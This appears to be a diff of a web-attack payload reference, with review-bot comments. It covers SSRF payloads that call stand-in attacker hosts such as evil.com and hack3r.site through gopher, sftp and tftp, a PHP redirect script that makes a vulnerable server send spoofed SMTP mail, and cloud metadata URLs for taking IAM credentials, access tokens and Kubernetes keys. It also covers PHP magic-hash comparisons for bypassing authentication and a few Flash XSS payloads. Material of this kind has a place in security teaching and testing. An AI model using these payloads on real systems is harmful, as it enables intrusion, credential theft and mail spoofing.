Sftp : a network protocol used for secure file transfer over secure shell
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ssrf.php?url=sftp://evil.com:11111/
|
||||||
|
```
|
||||||
|
|
||||||
|
Tftp : Trivial File Transfer Protocol, works over UDP
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
|
||||||
|
```
|
||||||
|
|
||||||
|
Ldap : Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
|
||||||
|
```
|
||||||
|
|
||||||
|
Gopher
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
|
||||||
|
|
||||||
|
will make a request like
|
||||||
|
HELO localhost
|
||||||
|
MAIL FROM:<hacker@site.com>
|
||||||
|
RCPT TO:<victim@site.com>
|
||||||
|
DATA
|
||||||
|
From: [Hacker] <hacker@site.com>
|
||||||
|
To: <victime@site.com>
|
||||||
|
Date: Tue, 15 Sep 2017 17:20:26 -0400
|
||||||
|
Subject: Ah Ah AH
|
||||||
|
|
||||||
|
You didn't say the magic word !
|
||||||
|
|
||||||
|
|
||||||
|
.
|
||||||
|
QUIT
|
||||||
|
```
|
||||||
|
|
||||||
|
Gopher SMTP - Back connect to 1337
|
||||||
|
|
||||||
|
```php
|
||||||
|
Content of evil.com/redirect.php:
|
||||||
|
<?php
|
||||||
|
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
|
||||||
|
?>
|
||||||
|
|
||||||
|
Now query it.
|
||||||
|
https://example.com/?q=http://evil.com/redirect.php.
|
||||||
|
```
|
||||||
|
|
||||||
|
Gopher SMTP - send a mail
|
||||||
|
|
||||||
|
```php
|
||||||
|
Content of evil.com/redirect.php:
|
||||||
|
<?php
|
||||||
|
$commands = array(
|
||||||
|
'HELO victim.com',
|
||||||
|
'MAIL FROM: <admin@victim.com>',
|
||||||
|
'RCPT To: <sxcurity@oou.us>',
|
||||||
|
'DATA',
|
||||||
|
'Subject: @sxcurity!',
|
||||||
|
'Corben was here, woot woot!',
|
||||||
|
'.'
|
||||||
|
);
|
||||||
|
|
||||||
|
$payload = implode('%0A', $commands);
|
||||||
|
|
||||||
|
header('Location: gopher://0:25/_'.$payload);
|
||||||
|
?>
|
||||||
|
```
|
||||||
|
|
||||||
|
## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
http://brutelogic.com.br/poc.svg -> simple alert
|
||||||
|
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf
|
||||||
|
|
||||||
|
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
|
||||||
|
```
|
||||||
|
|
||||||
|
## SSRF URL for Cloud Instances
|
||||||
|
|
||||||
|
### SSRF URL for AWS Bucket
|
||||||
|
|
||||||
|
[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
|
||||||
|
Interesting path to look for at `http://169.254.169.254`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Always here : /latest/meta-data/{hostname,public-ipv4,...}
|
||||||
|
User data (startup script for auto-scaling) : /latest/user-data
|
||||||
|
Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
|
||||||
|
```
|
||||||
|
|
||||||
|
DNS record
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254
|
||||||
|
http://metadata.nicob.net/
|
||||||
|
http://169.254.169.254.xip.io/
|
||||||
|
http://1ynrnhl.xip.io/
|
||||||
|
http://www.owasp.org.1ynrnhl.xip.io/
|
||||||
|
```
|
||||||
|
|
||||||
|
HTTP redirect
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Static:http://nicob.net/redir6a
|
||||||
|
Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
|
||||||
|
```
|
||||||
|
|
||||||
|
Alternate IP encoding
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://425.510.425.510/ Dotted decimal with overflow
|
||||||
|
http://2852039166/ Dotless decimal
|
||||||
|
http://7147006462/ Dotless decimal with overflow
|
||||||
|
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
|
||||||
|
http://0xA9FEA9FE/ Dotless hexadecimal
|
||||||
|
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
|
||||||
|
http://0251.0376.0251.0376/ Dotted octal
|
||||||
|
http://0251.00376.000251.0000376/ Dotted octal with padding
|
||||||
|
```
|
||||||
|
|
||||||
|
More urls to include
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/latest/user-data
|
||||||
|
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
|
||||||
|
http://169.254.169.254/latest/meta-data/
|
||||||
|
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
|
||||||
|
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
|
||||||
|
http://169.254.169.254/latest/meta-data/ami-id
|
||||||
|
http://169.254.169.254/latest/meta-data/reservation-id
|
||||||
|
http://169.254.169.254/latest/meta-data/hostname
|
||||||
|
http://169.254.169.254/latest/meta-data/public-keys/
|
||||||
|
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
|
||||||
|
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
|
||||||
|
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
|
||||||
|
```
|
||||||
|
|
||||||
|
E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance`
|
||||||
|
|
||||||
|
E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/`
|
||||||
|
|
||||||
|
### SSRF URL for Google Cloud
|
||||||
|
|
||||||
|
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/computeMetadata/v1/
|
||||||
|
http://metadata.google.internal/computeMetadata/v1/
|
||||||
|
http://metadata/computeMetadata/v1/
|
||||||
|
http://metadata.google.internal/computeMetadata/v1/instance/hostname
|
||||||
|
http://metadata.google.internal/computeMetadata/v1/instance/id
|
||||||
|
http://metadata.google.internal/computeMetadata/v1/project/project-id
|
||||||
|
```
|
||||||
|
|
||||||
|
Google allows recursive pulls
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
|
||||||
|
```
|
||||||
|
|
||||||
|
Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://metadata.google.internal/computeMetadata/v1beta1/
|
||||||
|
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
|
||||||
|
```
|
||||||
|
|
||||||
|
Interesting files to pull out:
|
||||||
|
|
||||||
|
- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`
|
||||||
|
- Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`
|
||||||
|
- Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`
|
||||||
|
|
||||||
|
### SSRF URL for Digital Ocean
|
||||||
|
|
||||||
|
Documentation available at `https://developers.digitalocean.com/documentation/metadata/`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl http://169.254.169.254/metadata/v1/id
|
||||||
|
http://169.254.169.254/metadata/v1.json
|
||||||
|
http://169.254.169.254/metadata/v1/
|
||||||
|
http://169.254.169.254/metadata/v1/id
|
||||||
|
http://169.254.169.254/metadata/v1/user-data
|
||||||
|
http://169.254.169.254/metadata/v1/hostname
|
||||||
|
http://169.254.169.254/metadata/v1/region
|
||||||
|
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
|
||||||
|
|
||||||
|
All in one request:
|
||||||
|
curl http://169.254.169.254/metadata/v1.json | jq
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Packetcloud
|
||||||
|
|
||||||
|
Documentation available at `https://metadata.packet.net/userdata`
|
||||||
|
|
||||||
|
### SSRF URL for Azure
|
||||||
|
|
||||||
|
Limited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/metadata/v1/maintenance
|
||||||
|
```
|
||||||
|
|
||||||
|
Update Apr 2017, Azure has more support; requires the header "Metadata: true" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/metadata/instance?api-version=2017-04-02
|
||||||
|
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for OpenStack/RackSpace
|
||||||
|
|
||||||
|
(header required? unknown)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/openstack
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for HP Helion
|
||||||
|
|
||||||
|
(header required? unknown)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/2009-04-04/meta-data/
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Oracle Cloud
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://192.0.0.192/latest/
|
||||||
|
http://192.0.0.192/latest/user-data/
|
||||||
|
http://192.0.0.192/latest/meta-data/
|
||||||
|
http://192.0.0.192/latest/attributes/
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Alibaba
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://100.100.100.200/latest/meta-data/
|
||||||
|
http://100.100.100.200/latest/meta-data/instance-id
|
||||||
|
http://100.100.100.200/latest/meta-data/image-id
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Kubernetes ETCD
|
||||||
|
|
||||||
|
Can contain API keys and internal ip and ports
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl -L http://127.0.0.1:2379/version
|
||||||
|
curl http://127.0.0.1:2379/v2/keys/?recursive=true
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Docker
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://127.0.0.1:2375/v1.24/containers/json
|
||||||
|
|
||||||
|
Simple example
|
||||||
|
docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
|
||||||
|
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
|
||||||
|
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Rancher
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl http://rancher-metadata/<version>/<path>
|
||||||
|
```
|
||||||
|
|
||||||
|
More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13](https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/)
|
||||||
|
- [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus
|
||||||
|
- [SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857)
|
||||||
|
- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
|
||||||
|
- [SSRF in proxy.duckduckgo.com](https://hackerone.com/reports/358119)
|
||||||
|
- [Blind SSRF on errors.hackerone.net](https://hackerone.com/reports/374737)
|
||||||
|
- [SSRF on *shopifycloud.com](https://hackerone.com/reports/382612)
|
||||||
|
- [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
||||||
|
- [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
|
||||||
|
- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
|
||||||
|
- [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)
|
||||||
|
- [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
|
||||||
|
- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
|
||||||
|
- [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
|
||||||
|
- [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
|
||||||
|
- [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
|
||||||
|
- [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
|
||||||
|
- [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
|
||||||
|
- [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
||||||
|
- [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
|
||||||
|
- [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)
|
||||||
|
- [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/)
|
||||||
|
- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)
|
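Review bot: In the AWS "More urls to include" block, `http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]` puts the IAM credentials path under `user-data`, while the "Interesting path" list in the same section and the entry two lines below both place it under `/latest/meta-data/iam/security-credentials/`; this looks like a copy-paste slip and should be dropped or corrected. Under the same AWS heading, the Jira example requests `/metadata/v1/maintenance`, a path this file lists in the Azure section, so the "AWS info disclosure" label should be checked against the write-up. In References, the imgur `vidgif/url` report (hackerone.com/reports/115748) is listed twice. The URL lists are fenced as `powershell` although they are neither PowerShell nor commands; a plain fence would be more accurate.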
62
Type juggling/README.md
Normal file
@ -0,0 +1,62 @@
|
|||||||
|
# PHP Juggling type and magic hashes
|
||||||
|
|
||||||
|
PHP provides two ways to compare two variables:
|
||||||
|
|
||||||
|
- Loose comparison using `== or !=` : both variables have "the same value".
|
||||||
|
- Strict comparison using `=== or !==` : both variables have "the same type and the same value".
|
||||||
|
|
||||||
|
## Type Juggling
|
||||||
|
|
||||||
|
### True statements
|
||||||
|
|
||||||
|
```php
|
||||||
|
var_dump('0010e2' == '1e3'); # true
|
||||||
|
var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0
|
||||||
|
var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0
|
||||||
|
var_dump('0x01' == 1) # true PHP 5.0 / false PHP 7.0
|
||||||
|
var_dump('0x1234Ab' == '1193131');
|
||||||
|
```
|
||||||
|
|
||||||
|
```php
|
||||||
|
'123' == 123
|
||||||
|
'123a' == 123
|
||||||
|
'abc' == 0
|
||||||
|
```
|
||||||
|
|
||||||
|
```php
|
||||||
|
'' == 0 == false == NULL
|
||||||
|
'' == 0 # true
|
||||||
|
0 == false # true
|
||||||
|
false == NULL # true
|
||||||
|
NULL == '' # true
|
||||||
|
```
|
||||||
|
|
||||||
|
### NULL statements
|
||||||
|
|
||||||
|
```php
|
||||||
|
var_dump(sha1([])); # NULL
|
||||||
|
var_dump(md5([])); # NULL
|
||||||
|
```
|
||||||
|
|
||||||
|
## Magic Hashes - Exploit
|
||||||
|
|
||||||
|
If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.
|
||||||
|
|
||||||
|
| Hash | “Magic” Number / String | Magic Hash | Found By |
|
||||||
|
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
|
||||||
|
| MD5 | 240610708 | 0e462097431906509019562988736854 | Michal Spacek |
|
||||||
|
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
|
||||||
|
|
||||||
|
```php
|
||||||
|
<?php
|
||||||
|
var_dump(md5('240610708') == md5('QNKCDZO')); # bool(true)
|
||||||
|
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
|
||||||
|
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
|
||||||
|
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
|
||||||
|
?>
|
||||||
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
|
||||||
|
* [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
|
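Review bot: In the "True statements" block, `var_dump('0xABCdef' == ' 0xABCdef');` appears twice verbatim and `var_dump('0x01' == 1)` is missing its terminating semicolon, so the block does not run as pasted; drop the duplicate, add the `;`, and give `var_dump('0x1234Ab' == '1193131');` a result comment like its neighbours. The "Magic Hashes" section describes the loose-comparison behaviour but never states the fix; one line recommending `===` or `hash_equals()` when comparing hashes would make the page useful to people fixing the bug as well as finding it. The table lists `240610708` for MD5 but the example compares it against `QNKCDZO`, which is not in the table. The reference link text "WhieHatSec" is misspelled.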
@ -59,6 +59,10 @@ IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e
|
|||||||
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### .htaccess
|
||||||
|
|
||||||
|
An .htaccess file is a way to configure the details of your website without needed to alter the server config files.
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|
||||||
|
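Review bot: The added `.htaccess` section is a heading plus a single definition sentence, and that sentence reads "without needed to alter" where "without needing to alter" is meant. It also does not say why an .htaccess file matters in the context of this file or give any example, whereas the block just above it in the hunk gives concrete cases; either expand the section with the relevant case and a reference, or hold the heading until the content is ready.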